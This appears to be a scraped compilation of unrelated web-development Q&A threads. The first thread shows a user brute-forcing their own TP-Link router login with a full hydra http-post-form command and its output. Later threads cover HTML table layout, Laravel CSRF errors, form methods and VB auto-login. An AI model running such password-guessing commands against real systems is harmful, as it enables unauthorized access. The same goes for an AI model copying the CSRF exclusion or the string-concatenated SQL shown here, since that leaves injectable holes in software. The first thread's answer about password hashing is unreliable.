I setup the most easiest password for my tplink router: aaaaaaac
default user is admin
I looked at page source at and found this:
<FORM METHOD="POST" ACTION="/Forms/login_security_1" name="Login_Form"><p> </p>
<p> </p>
<table width="540" border="0" align=center cellpadding="0" cellspacing="0">
<tr>
<td><table width="100%" border="0" align=center cellpadding="0" cellspacing="0">
<tr>
<td height="31"> </td><td> </td><td> </td></tr><tr>
<td width="8%"> </td><td width="86%" valign=top>
<table width="86%" border="0" align=center>
<tr>
<td> </td><td> </td><td> </td></tr><tr>
<td align=center colspan=3 style="color:gray;font-family:Arial;text-align:left;margin:0px auto;font-size:14px;" id="tr1">
</td><INPUT TYPE="HIDDEN" NAME="tipsFlag" VALUE="0"><INPUT TYPE="HIDDEN" NAME="timevalue" VALUE="0"><SCRIPT language="JavaScript">
if(document.Login_Form.tipsFlag.value == 1){
var infoStr='The username or password is incorrect,please input again.';
document.getElementById("tr1").innerHTML = infoStr;
}else if(document.Login_Form.tipsFlag.value == 2){
timelast = document.Login_Form.timevalue.value;
window.setInterval("IncreaseSec()", 1000);
}
</SCRIPT>
</tr></table><table style="background-color:white" width="86%" border="0" align=center>
<tr>
<td height=35> </td><td> </td><td> </td></tr><tr>
<td align=right width=35%>
<FONT color=gray><b>
Username:</b></font>
</td><td><INPUT TYPE="TEXT" NAME="Login_Name" SIZE="12" MAXLENGTH="31" VALUE="" class="text" onfocus="changeBorderColor(this,1);" onblur="changeBorderColor(this,0);"></td></tr><tr>
<td height=5> </td><td> </td><td> </td></tr><tr>
<td align=right >
<FONT color=gray><b>
Password:</b></font>
</td><td><INPUT TYPE="PASSWORD" NAME="Login_Pwd" SIZE="12" MAXLENGTH="31" VALUE="" autocomplete="off" class="text" onfocus="changeBorderColor(this,1);" onblur="changeBorderColor(this,0);"></td></tr><tr>
<td align=center colspan=3>
<INPUT TYPE="BUTTON" NAME="texttpLoginBtn" VALUE="Login" class="LoginBtn" onClick="checkForm();"></td></tr><tr>
<td align=center colspan=3>
<INPUT TYPE="HIDDEN" NAME="uiWebLoginhiddenUsername" VALUE=""><INPUT TYPE="HIDDEN" NAME="uiWebLoginhiddenPassword" VALUE=""></td></tr><tr>
<td height="30" colspan="3" style="text-align:center;">
<label id="copyright" >
Copyright © 2014 TP-LINK Technologies Co., Ltd. All rights reserved.</label>
</td></tr></table></td><td width="6%"> </td></tr></table></td></tr></table><!-- RpZDT -->
</form><p> </p>
I also looked at POST source and found:
tipsFlag=0&timevalue=0&Login_Name=34&Login_Pwd=Ha2S%2BeOKqmzA6nrlmTeh7%3D%3D&uiWebLoginhiddenUsername=e369853df766fa44e1ed0ff613f563bduiWebLoginhiddenPassword=e369853df766fa44e1ed0ff613f563bd
So I attacked my own router with this line:
hydra -f -l admin -x 8:8:a -V 192.168.1.1 http-post-form "/login_security.html/Forms/login_security_1:tipsFlag=0&timevalue=0&Login_Name=^USER^&Login_Pwd=^PASS^&uiWebLoginhiddenUsername=^USER^&uiWebLoginhiddenPassword=^PASS^:bad"
Hydra found a wrong password
[80][http-post-form] host: 192.168.1.1 login: admin password: aaaaaaak
[STATUS] attack finished for 192.168.1.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
What I'm doing wrong?
It's hard for me to say what hydra is doing as I'm familiar.. but a lot of times passwords are hashed so you don't need the actual value you just need a value that hashes the same as your actual password. Check and see if aaaaaaak works as a sign-in password for your router and if it does it's just brute forcing from z-a which isn't what you were expecting.
Related
I've created this table that's well formatted in chrome but in ie8 the < td> tag ignores the percentages that i've setted, then if i add table-layout:fixed as someone suggested ie8 ignores the proportion and set them to 25-25-25-25 in the field CAP Via etc...
If i remove the doctype it works (i can't remove it because i need it for something else)
<!DOCTYPE HTML>
<html style ="height: 100%">
<body>
<table cellpadding=4 align=center width=772 border=1 style="border-collapse:collapse;">
<tr>
<td valign=top colspan=4>
<center>
<b>INFORMAZIONI CLIENTE</b>
</center>
</td>
</tr>
<tr>
<td align"left" valign=top colspan=4>
Nome e Cognome del Cliente/Azienda:<br>
<input type="Text" align="LEFT" size="120">
</td>
</tr>
<tr>
<td align"left" valign=top colspan=4>
Via:
<br>
<input type="Text" align="LEFT" size="120">
</td>
</tr>
<tr>
<td align"left" valign=top style="width:1%;">
CAP:
<br>
<input type="Text"align="LEFT" size="4">
</td>
<td align"left" valign=top style="width:1%;">
Città:
<br>
<input type="Text" align="LEFT" size="65">
</td>
<td align"left" valign=top style="width:1%;">
Prov:
<br>
<input type="Text" align="LEFT" size="2">
</td>
<td align"left" valign=top style="width:99%;">
Data:
<br>
<input type="Text" align="LEFT" size="1" > / <input type="Text" align="LEFT" size="1" ><nobr> / <input type="Text" align="LEFT" size="4">
</td>
</tr>
<tr>
<td align"left" valign=top colspan=4>
Info aggiuntive
<br>
<input type="Text" align="LEFT" size="120">
</td>
</tr>
</table>
</body>
</html>
I want to do multiple edit, I want to edit from the data I checked following script .blade, I found the TokenMismatchException error in VerifyCsrfToken.php line 68: when updating.
<form name="form" action="{{url('/update-kb')}}" method="post" onsubmit="return deleteConfirm();"/>
<div class="table table-responsive">
<table id="example1" class="table table-bordered">
<thead>
<tr class="info">
<th width="3%"><input type="checkbox" name="select_all" id="select_all" value=""/></th>
<th>No</th>
<th>Data lengkap</th>
<th>Aksi</th>
</tr>
</thead>
<tbody>
<?php $i = 1; ?>
#foreach( $datasiswa as $row )
<tr>
<td>
<label class="checkbox-inline"><input type="checkbox" name="checked_id[]" class="checkbox" value="{{$row->id}}"/>
</label>
</td>
<td width="5%">{{ $i }}</td>
<td width="95%">
<table class="table">
<tr>
<td class="info">Nama panggilan</td>
<td>{{$row->nm_panggilan}}</td>
<td class="warning">Pekerjaan ibu</td>
<td>{{$row->pekerjaan_ibu}}</td>
</tr>
<tr>
<td class="info">Jenis kelamin</td>
<td>{{$row->jenis_kelamin}}</td>
<td class="warning">No. Handphone</td>
<td>{{$row->hp_ibu}}</td>
</tr>
<tr>
<td class="info">Tempat, Tanggal lahir</td>
<td>{{$row->tempat}}, {{$row->tanggal_lahir}}</td>
<td class="warning">Alamat</td>
<td>{{$row->alamat}}</td>
</tr>
<tr>
<td class="info">Status anak</td>
<td>{{$row->status_anak}}</td>
<td class="warning">Golongan darah</td>
<td>{{$row->goldar}}</td>
</tr>
<tr>
<td class="info">Agama</td>
<td>{{$row->agama}}</td>
<td class="warning">Nama wali</td>
<td>{{$row->nm_wali}}</td>
</tr>
<tr>
<td class="info">Kewarganegaraan</td>
<td>{{$row->kewarganegaraan}}</td>
</tr>
<tr>
<td class="info">Anak ke-</td>
<td>{{$row->anak_ke}}</td>
</tr>
<tr>
<td class="info">Kelas</td>
<td>{{$row->kelas}}</td>
</tr>
</table>
</td>
<td>
<a href="{!! url('/'.$row->id.'/edit-siswa') !!}">
<button class="btn btn-default btn-block"><i class="fa fa-edit"></i></button><br>
</a>
<a href="{!! url('/'.$row->id.'/delete-siswa') !!}">
<button class="btn btn-danger btn-block"><i class="fa fa-trash"></i></button>
</a>
</td>
</td>
</tr>
<?php $i++; ?>
#endforeach
</tbody>
</table>
<div class="col-md-3">
<input type="submit" class="btn btn-danger" name="delete_submit" value="Hapus"/>
</div>
</div>
</form>
But I still have error, what causes it?
public function updatekb($id, Request $request)
{
$data = Datasiswa::find($id);
if (isset($request->delete_submit)) {
$idArr = $request->checked_id;
foreach ($idArr as $id) {
DB::update('update tb_siswa, tb_pernyataan set tb_pernyataan.kelas = "cekcek" where tb_pernyataan.kelas = "TK A" and tb_siswa.sekolah = "KB TK KHALIFAH 25" and id = "' . $id . '" ');
}
return back();
Session::flash('sukses', 'Data berhasil di update', compact('data'));
}
}
Add below to your form element.
<input type="hidden" name="_token" value="{{ csrf_token() }}" />
Some answers are suggesting to disable csrf protection which is possible but NOT RECOMENDED. This leaves your application vulnureable.
Laravel use CSRF token to verify user request. so you have to use it on yevery request if you want to disable it then you can disable it from See here how to disable it or you can use it as
{{ csrf_field() }}
or
<input type="hidden" name="_token" value="{{ csrf_token() }}"/>
You can resolve this issue in two ways:-
First One:-
{{ csrf_field() }}
or
<input type="hidden" name="_token" value="{{ csrf_token() }}"/> // add this in form
Or the other (simpler) way, inside your app\Http\Middleware/VerifyCsrfToken.php add
protected $except = [
'update-kb', // your route name
];
Hope it helps!
I'm using jquery to copy 1 row to create 1 row below. Control is dynamic.
I have 1 control to copy and paste from tableclone
<input type="button" value="Add Row" id="addrowbutton" class="Button" />
This is the main table :
<table id="registrationtable" class="Grid">
<tr class="Caption">
<th scope="col">
Registration Number
</th>
<th scope="col"> Is Install
</th>
<th scope="col"> Upload File
</th>
<th scope="col"> Remove
</th>
</tr>
And I clone from here
<table id="tableclone" style="display: none;">
<tbody>
<tr class="Row">
<td style="white-space:nowrap;">
<input id="RegistrasiNo" class="RegistrasiNoClass" type="text" />
</td>
<td>
<asp:DropDownList ID="ddlIsInstall" runat="server" class="IsInstallclass">
<asp:ListItem Value="Y" Text="Yes"></asp:ListItem>
<asp:ListItem Value="N" Text="No"></asp:ListItem>
</asp:DropDownList>
</td>
<td>
<div style="float: left">
<input type="file" id="fileUpload" class="fileuploadclass" />
</div>
<div style="float: left">
<input type="button" value="Upload File" id="UploadFileControll" class="UploadFileControllclass" runat="server" />
</div>
</td>
<td>Remove</td>
</tr>
</tbody>
<asp:Button ID="SaveRegistrationID" runat="server" Text="SAVE" OnClick="SaveRegistrationID_Click" CssClass="Button" />
How to get posted file from fileupload dynamicly (more than 1 row) when i click button SAVE ?
I'm trying to submit some form using POST method. Here is par of form:
<form action="interlopers.php" mehod="post" id = "interlopersForm" name="interlopersForm" onsubmit="return validateInterlopersForm()">
<table border="0">
<tr>
<td> <label for="ast_num" > Ast. num </label> </td>
<td> <input type="text" name="ast_num" id = "ast_num"
value="<?php if(isset($_REQUEST['ast_num'])) { echo htmlentities ($_REQUEST['ast_num']); } ?>"
size="6"> </td>
</tr>
<tr>
<td><label for="cut_off"> Cut-off </label></td>
<td><input type="text" name="cut_off" id="cut_off" size="6" ></td>
</tr>
<tr>
<td><label for="data"> Data </label></td>
<td><input type ="checkbox" name="data" id = "dataSDSS" value="SDSS" checked> SDSS <br>
<input type ="checkbox" name="data" id="dataWISE" value="WISE" checked > WISE <br>
<input type ="checkbox" name="data" id = "dataSp" value="Sp" checked> Taxonomy</td>
</tr>
<tr>
<td> <label for="isFinalStep"> Just interlopers? </label> </td>
<td> <input type = "checkbox" name="isFinalStep" id = "isFinalStep"> </td>
</tr>
<tr> <input type="hidden" name="submitted" value="1"> </tr>
<tr>
<td colspan="2" align="center"> <input type="submit" value="Calculate" > </td>
</tr>
</table>
</form>
But, instead of getting POST request im getting GET request. I'm using apache server and php5 on Ubuntu. I tried this on local-server and on remote host, but still GET instead of POST.
Change mehod="post" to method="post".
You wrote wrong.
I need make an auto login form application with Visual Basic 10.0 for the following code:
</script>
<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0">
<table cellpadding="0" cellspacing="0" border="0" height="100%">
<tr>
<td rowspan="10" width="50%" height="100%" background="images/bg1222.jpg" style="background-position:right top; background-repeat:repeat-y"></td>
<td rowspan="10" width="1" bgcolor="#000000"></td>
<td valign="top">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td width=100%>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="778" height="153">
<param name="movie" value="images/hed2.swf">
<param name="quality" value="high">
<embed src="images/hed2.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="778" height="153"></embed>
</object>
</td>
</tr>
</table>
</td>
<!--<td rowspan="10" width="0" bgcolor="#000000"></td>-->
<td rowspan="10" width="50%" height="100%" background="images/bg1223.jpg" style="background-position:left top; background-repeat:repeat-y"></td>
</tr>
<tr>
<td width="780" height="30" align="center" valign="bottom" background="images/footer.gif"></td>
</tr>
<tr>
<td height="583" valign="top" style="background-repeat:repeat-y;" >
<br><br><br><br><br><br><br>
<center>
<form action="/cse/login/login1_check.jsp" name="first" method="post">
<table width="25%" height="90" border="0" class='formtable1'>
<caption align="top">
<strong> User Login </strong>
<br>
</caption>
<tr>
</tr>
<tr>
<td width="24%" height="32">
<div align="right"> User ID: </div>
</td>
<td width="76%">
<label>
<input name="uid" type="text" >
</label>
</td>
</tr>
<tr>
<td height="43">
<div align="right"> Password: </div>
</td>
<td>
<label>
<input name="password" type="password" >
</label>
</td>
</tr>
</table>
<input type="submit" name="sub" value="Login">
</form>
</center>`enter code here`
Say username is user and password is pass.
It should be auto filled and clicked in the submit button. What would the code be for Visual Basic 10.0?
Try this:
If Not String.IsNullOrEmpty(My.Settings.Username) And Not String.IsNullOrEmpty(My.Settings.Password) Then
TxtUsername.Text = My.Settings.Username
TxtPassword.Text = My.Settings.Password
End If
You first need to take all the elements that you want to interact to. If they have an ID, you don't need to search, simply get the element with:
Dim elem As HtmlElement = Webbrowser1.Document.GetElementById("myId")
If not, you need to search for yours, for example:
Dim inputs As New List(Of HtmlElement)(a.Document.GetElementsByTagName("input"))
For Each elem As HtmlElement In inputs
If elem.GetAttribute("name").Equals("uid") Then
'...
End If
Next
To set a value of a input:
elem.SetAttributte("value", passwordVar)
To click a clickable element (such a submit input):
elem.InvokeMember("submit")
Or:
elem.InvokeMember("click")